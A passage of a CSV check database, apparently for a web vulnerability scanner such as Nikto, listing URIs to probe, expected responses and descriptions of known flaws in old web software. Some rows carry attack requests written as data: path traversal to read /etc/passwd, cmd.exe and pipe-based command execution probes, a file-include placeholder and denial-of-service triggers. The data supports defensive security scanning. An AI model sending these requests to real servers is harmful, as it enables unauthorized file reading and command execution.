status","","","","","This allows uploads to /users. Create /users and give web user read only access.","","" "000207","","0","/upload.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000208","","0","/uploadn.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000209","","0","/uploadx.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000210","","0","/wa.exe","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000211","","1","/basilix/compose-attach.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads","","" "000212","","1","/server/","GET","200","","","","","Possibly Macromedia JRun or CRX WebDAV upload","","" "000213","","1","@CGIDIRSfpsrvadm.exe","GET","200","","","","","Potentially vulnerable CGI program.","","" "000214","","1be","/siteminder/smadmin.html","GET","Admin Login","","","","","SiteMinder admin login page available.","","" "000215","","1b","/vgn/ac/data","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000216","","1b","/vgn/ac/delete","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000217","","1b","/vgn/ac/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000218","","1b","/vgn/ac/esave","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000219","","1b","/vgn/ac/fsave","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000220","","1b","/vgn/ac/index","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000221","","1b","/vgn/asp/MetaDataUpdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000222","","1b","/vgn/asp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000223","","1b","/vgn/asp/status","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000224","","1b","/vgn/asp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000225","","1b","/vgn/errors","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000226","","1b","/vgn/jsp/controller","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000227","","1b","/vgn/jsp/errorpage","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000228","","1b","/vgn/jsp/initialize","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000229","","1b","/vgn/jsp/jspstatus","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000230","","1b","/vgn/jsp/jspstatus56","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000231","","1b","/vgn/jsp/metadataupdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000232","","1b","/vgn/jsp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000233","","1b","/vgn/jsp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000234","","1b","/vgn/legacy/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000235","","1b","/vgn/login","GET","200","","","","","Vignette server may allow user enumeration based on the login attempts to this file.","","" "000236","","2","/webtop/wdk/samples/index.jsp","GET","WDK Fusion Samples","","","","","Documentum Webtop Example Code","","" "000237","","2","@CGIDIRS.cobalt","GET","200","","","","","May allow remote admin of CGI scripts.","","" "000238","","2","/WEB-INF/web.xml","GET","","" "000292","","3","/shopa_sessionlist.asp","GET","200","","","","","VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.","","" "000293","https://www.webhostingtalk.nl/bugtraq-mailing-lijst/23898-simplebbs-1-0-6-default-permissions-vuln.html","3","/simplebbs/users/users.php","GET","200","","","","","Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.","","" "000294","https://vulners.com/exploitdb/EDB-ID:22381","3","/sips/sipssys/users/a/admin/user","GET","Password","","200","","","SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.","","" "000295","","2","/tcb/files/auth/r/root","GET","u_pwd","","","","","HP-UX has the tcb auth file system on the web server.","","" "000296","","3","@TYPO3typo3conf/","GET","200","","","","","This may contain sensitive TYPO3 files.","","" "000297","","3","@TYPO3typo3conf/database.sql","GET","200","","","","","TYPO3 SQL file found.","","" "000298","","3","@TYPO3typo3conf/localconf.php","GET","200","","","","","TYPO3 config file found.","","" "000299","https://www.securityfocus.com/bid/7186/info","3","/vchat/msg.txt","GET","200","","","","","VChat allows user information to be retrieved.","","" "000300","CVE-2003-0403","3","/vgn/license","GET","200","","","","","Vignette server license file found.","","" "000301","","3","/web.config","GET","","","200","","","ASP config file is accessible.","","" "000302","https://www.php.net/manual/en/function.phpinfo.php","3","/webamil/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000303","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart-lite/config/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000304","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart-lite/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000305","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/carts/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000306","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/config/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000307","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/config/clients.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000308","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/orders/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000309","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000310","","3","/webmail/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000311","","3","/whateverJUNK(4).html","GET","InterScan HTTP Version","","","","","InterScan VirusWall on the remote host reveals its version number in HTTP error messages.","","" "000312","","3","/ws_ftp.ini","GET","200","","","","","Can contain saved passwords for FTP sites","","" "000313","","3","/WS_FTP.ini","GET","200","","","","","Can contain saved passwords for FTP sites","","" "000314","CVE-2002-1528","3","@CGIDIRSMsmMask.exe","GET","200","","","","","MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.","","" "000315","","3","/_mem_bin/auoconfig.asp","GET","200","","","","","Displays the default AUO (LDAP) schema, including host and port.","","" "000316","https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt","3","/_mem_bin/auoconfig.asp","GET","LDAP","","","","","LDAP information revealed via asp.","","" "000317","https://vulners.com/osvdb/OSVDB:17664","3","/_mem_bin/remind.asp","GET","Recover","","200","","","Page will give the password reminder for any user requested (username must be known).","","" "000318","","3","/exchange/lib/ATTACH.INC","GET","File upload","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000319","https://vulners.com/osvdb/OSVDB:17659","3","/SiteServer/Admin/knowledge/persmbr/vs.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000320","https://vulners.com/osvdb/OSVDB:17661","3","/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000321","https://vulners.com/osvdb/OSVDB:17662","3","/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000322","https://vulners.com/osvdb/OSVDB:17660","3","/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000323","","3","/trace.axd","GET","Application Trace","","","","","The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.","","" "000324","","3","/tvcs/getservers.exe?action=selects1","GET","200","","","","","Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.","","" "000325","MS02-018","3","/whatever.htr","GET","Error: The requested file could not be found\. <\/html>","","","","","May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution.","","" "000327","","3","/./","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Appending '/./' to a directory allows indexing","","" "000328","","3","/nsn/fdir.bas:ShowVolume","GET","200","","","","","You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in","","" "000329","","3","/nsn/fdir.bas","GET","FDIR\sv1","","","","","You can use fdir to ShowVolume and ShowDirectory.","","" "000330","","3","/servlet/webacc?User.html=noexist","GET","templates\/","","","404","","Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.","","" "000331","","4","/forum/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","","" "000332","","4","/webmail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","","" "000333","","5","/jamdb/","GET","200","","","","","JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.","","" "000334","CVE-2000-0063","6","/cgi/cgiproc?","GET","200","","","","","It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.","","" "000335","","7","@CGIDIRSaddbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000336","CVE-2002-0934","7","@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","","" "000337","","7","@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","","" "000338","","7","@CGIDIRSshtml.dll","GET","200","","","","","This may allow attackers to retrieve document source.","","" "000339","CVE-2003-0676","7","/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv","GET","root:","","","","","iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2.","","" "000340","","8","@CGIDIRSaglimpse.cgi","GET","200","","","","","This CGI may allow attackers to execute remote commands.","","" "000341","","8","@CGIDIRSaglimpse","GET","200","","","","","This CGI may allow attackers to execute remote commands.","","" "000342","","8","@CGIDIRSarchitext_query.cgi","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","","" "000343","","8","@CGIDIRScgiemail-1.4/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000344","","8","/cgi-local/cgiemail-1.6/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000345","CVE-2003-0104","8","/servlet/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution.","","" "000346","","8","/servlet/sunexamples.BBoardServlet","GET","200","Error Occurred","","","","This default servlet lets attackers execute arbitrary commands.","","" "000347","CVE-2003-0104","8","/servlets/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution.","","" "000348","","8","@CGIDIRScmd.exe?/c+dir","GET","200","","","","","cmd.exe can execute arbitrary commands","","" "000349","","8","@CGIDIRScmd1.exe?/c+dir","GET","200","","","","","cmd1.exe can execute arbitrary commands","","" "000350","","8","@CGIDIRShello.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","","" "000351","","8","@CGIDIRSpost32.exe|dir%20c:\\","GET","200","","","","","post32 can execute arbitrary commands","","" "000352","BID-5520","8","/perl/-e%20print%20Hello","GET","200","","","","","The Perl interpreter on the Novell system may allow any command to be executed.","","" "000353","","ae","/admin.cgi","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","","" "000354","","ae","/interscan/","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","","" "000355","","a","/vgn/legacy/save","GET","200","","","","","Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.","","" "000356","","b","/","GET","default Tomcat","","","","","Appears to be a default Apache Tomcat install.","","" "000357","","b","/IDSWebApp/IDSjsp/Login.jsp","GET","200","","","","","Tivoli Directory Server Web Administration.","","" "000358","CVE-1999-0607","b","/quikstore.cfg","GET","200","","","","","Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt","","" "000359","","b","/quikstore.cgi","GET","200","","","","","A shopping cart.","","" "000360","","b","/securecontrolpanel/","GET","200","","","","","Web Server Control Panel","","" "000361","","b","/siteminder","GET","200","","","","","This may be an indication that the server is running Siteminder for SSO","","" "000362","","b","/webmail/","GET","200","","","","","Web based mail package installed.","","" "000363","","b","/Xcelerate/LoginPage.html","GET","Xcelerate Login Page","","","","","Xcelerate Content Server by Divine/OpenMarket login page found.","","" "000364","","b","/_cti_pvt/","GET","200","","","","","FrontPage directory found.","","" "000365","","b","/smg_Smxcfg30.exe?vcc=3560121183d3","GET","200","","","","","This may be a Trend Micro Officescan 'backdoor'.","","" "000366","","2b","/examples/servlets/index.html","GET","Servlet Examples","","","","","Apache Tomcat default JSP pages present.","","" "000367","","3b","/nsn/..%5Cutil/attrib.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000368","","3b","/nsn/..%5Cutil/chkvol.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000369","","3b","/nsn/..%5Cutil/copy.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000370","","3b","/nsn/..%5Cutil/del.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000371","","3b","/nsn/..%5Cutil/dir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000372","","3b","/nsn/..%5Cutil/dsbrowse.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000373","","3b","/nsn/..%5Cutil/glist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000374","","3b","/nsn/..%5Cutil/lancard.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000375","","3b","/nsn/..%5Cutil/md.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000376","","3b","/nsn/..%5Cutil/rd.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000377","","3b","/nsn/..%5Cutil/ren.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000378","","3b","/nsn/..%5Cutil/send.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000379","","3b","/nsn/..%5Cutil/set.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000380","","3b","/nsn/..%5Cutil/slist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000381","","3b","/nsn/..%5Cutil/type.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000382","","3b","/nsn/..%5Cutil/userlist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000383","","3b","/nsn/..%5Cweb/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000384","","3b","/nsn/..%5Cweb/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000385","","3b","/nsn/..%5Cwebdemo/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000386","","3b","/nsn/..%5Cwebdemo/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000387","CVE-2002-2106","c","/wikihome/action/conflict.php?TemplateDir=@RFIURL","GET","PHP Version","","","","","Some versions of WikkiTikkiTavi allow external source to be included.","","" "000388","","1","@CGIDIRSarchie","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000389","","1","@CGIDIRScalendar.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000390","","1","@CGIDIRScalendar","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000391","","1","@CGIDIRSdate","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000392","","1","@CGIDIRSfortune","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000393","","1","@CGIDIRSredirect","GET","200","","","","","Redirects via URL from form","","" "000394","","1","@CGIDIRSuptime","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000395","","1","@CGIDIRSwais.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000396","","2","//","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.","","" "000397","","2","/webtop/wdk/","GET","Directory Listing for \/wdk\/","","","","","Documentum Webtop Server appears to be installed","","" "000398","https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html","2","/SilverStream","GET","title>.*SilverStream.*<\/title","","","","","SilverStream allows directory listing","","" "000399","","2e","/signon","GET","Administrator Login","","","","","Tivoli administrator login found. Test the default login of admin/admin. Tivoli allows system administration.","","" "000400","","2","/upd/","GET","200","","","","","WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000401","","3","/examples/jsp/source.jsp??","GET","Directory Listing","","","","","Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed.","","" "000402","CVE-2002-2008","3","/lpt9","GET","FileNotFoundException:","","","","","Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher.","","" "000403","https://securiteam.com/windowsntfocus/5BP081F0AC/","3","/cfcache.map","GET","Mapping=","","SourceTimeStamp","","","May leak directory listing, may also leave server open to a DOS.","","" "000404","https://securiteam.com/windowsntfocus/5BP081F0AC/","3","/cfdocs/cfcache.map","GET","Mapping=","","SourceTimeStamp","","","May leak directory listing, may also leave server open to a DOS.","","" "000405","","3","/CVS/Entries","GET","200","","","","","CVS Entries file may contain directory listing information.","","" "000406","","3","/lpt9.xtp","GET","java\.io\.FileNotFoundException:","","","","","Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.","","" "000408","https://seclists.org/fulldisclosure/2003/Jun/536","37","@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file \.<\/font><\/p>","","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher.","","" "000409","","3","/asp/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000410","","3","/asp/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000411","","3","/iissamples/issamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000412","","3","/iissamples/issamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000413","","3","/ISSamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000414","","3","/ISSamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000415","","3","/junk.aspx","GET","NET Framework Version:","","\[FileNotFoundException\]:","","","ASP.NET reveals its version in invalid .aspx error messages.","","" "000416","","3","/oc/Search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000417","","3","/oc/Search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000418","","3","/search/htx/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000419","","3","/search/htx/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000420","","3","/search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000421","","3","/search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000422","","3","/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000423","","3","/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000424","CVE-2002-0407","3","@CGIDIRScom5..........................................................................................................................................................................................................................box","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000425","CVE-2002-0407","3","@CGIDIRScom5.java","GET","Execution of","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000426","CVE-2002-0407","3","@CGIDIRScom5.pl","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000428","https://securiteam.com/securitynews/6W0030U35W/","3","/?OpenServer","GET","\\\/icons\\\/abook\\\.gif","","","","","This install allows remote users to enumerate DB names.","","" "000431","CVE-2000-0021","3","/cgi-bin/testing_whatever","GET","domino\/cgi-bin","","","","","The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.","","" "000436","","3","/LOGIN.PWD","GET","200","","","","","MIPCD password file with unencrypted passwords. MIPDCD should not have the web interface enabled.","","" "000437","","3","/USER/CONFIG.AP","GET","200","","","","","MIPCD configuration information. MIPCD should not have the web interface enabled.","","" "000438","","3","@CGIDIRSmail","GET","200","","","","","Simple Perl mailing script to send form data to a pre-configured email address","","" "000439","","3","@CGIDIRSnph-error.pl","GET","200","","","","","Gives more information in error messages","","" "000440","","3","@CGIDIRSpost-query","POST","MYDATA","","","","","Echoes back result of your POST","MYDATA","" "000441","","3","@CGIDIRSquery","GET","200","","","","","Echoes back result of your GET","","" "000442","","3","@CGIDIRStest-cgi.tcl","GET","200","","","","","May echo environment variables or give directory listings","","" "000443","","3","@CGIDIRStest-env","GET","200","","","","","May echo environment variables or give directory listings","","" "000444","http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.11220","3","/.perf","GET","ListenSocket","","","","","Contains Netscape/iPlanet server performance information","","" "000445","CVE-1999-0239","3","/","get","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Fasttrack can give a directory listing if issued 'get' instead of 'GET'","","" "000446","","3","/","INDEX","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.","","" "000447","","3","//","GET","Proxy autoconfig","","","","","Proxy auto configuration file retrieved.","","" "000448","","3","/admin-serv/config/admpw","GET","200","","","","","This file contains the encrypted Netscape admin password. It should not be accessible via the web.","","" "000449","https://vulners.com/osvdb/OSVDB:39140","3","/test.php%20","GET","<\?php","","","","","The OmniHTTP install may allow php/shtml/pl script disclosure. Upgrade to the latest version.","","" "000450","","3","/*.*","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000451","","3","/cgi-bin/cgi_process","GET","200","","","","","WASD reveals a lot of system information in this script. It should be removed.","","" "000452","","3","/ht_root/wwwroot/-/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000453","","3","/JUNK(10)","GET","Document not found \.\.\. \/","","","","","WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000454","","3","/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000455","","3","/tree","GET","200","","","","","WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000456","","3","@CGIDIRSindex.js0x70","GET","\\<\\\%\\=","","","","","Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.","","" "000457","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%00/","GET","<\%","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher.","","" "000458","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%00/","GET","directory listing of","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher.","","" "000459","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%00/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513","","" "000460","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2e/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000461","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2e/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000462","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2e/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000463","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2f/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000464","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2f/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000465","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2f/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000466","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%5c/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000467","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%5c/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000468","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%5c/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000469","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/index.jsp%00x","GET","<\%=","","","","","Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k.","","" "000470","","2","/weblogic","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "000471","","3","/%a%s%p%d","GET","\*s\?d","","","","","Format bug is present & may reveal system path, upgrade to the latest version.","","" "000472","","3","/index.html%20","GET","File for URL","","","","","Website may reveal file system paths by adding %20 to the end of a legitimate .html request.","","" "000476","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","@CGIDIRSorders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000480","","3d","@CGIDIRScgitest.exe","GET","200","","","","","This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.","","" "000481","","6","/examples/servlet/AUX","GET","200","","","","","Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.","","" "000482","CVE-2003-0169","6","@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.","","" "000483","","6","/cfdocs/cfmlsyntaxcheck.cfm","GET","200","","not found","","","Can be used for a DoS 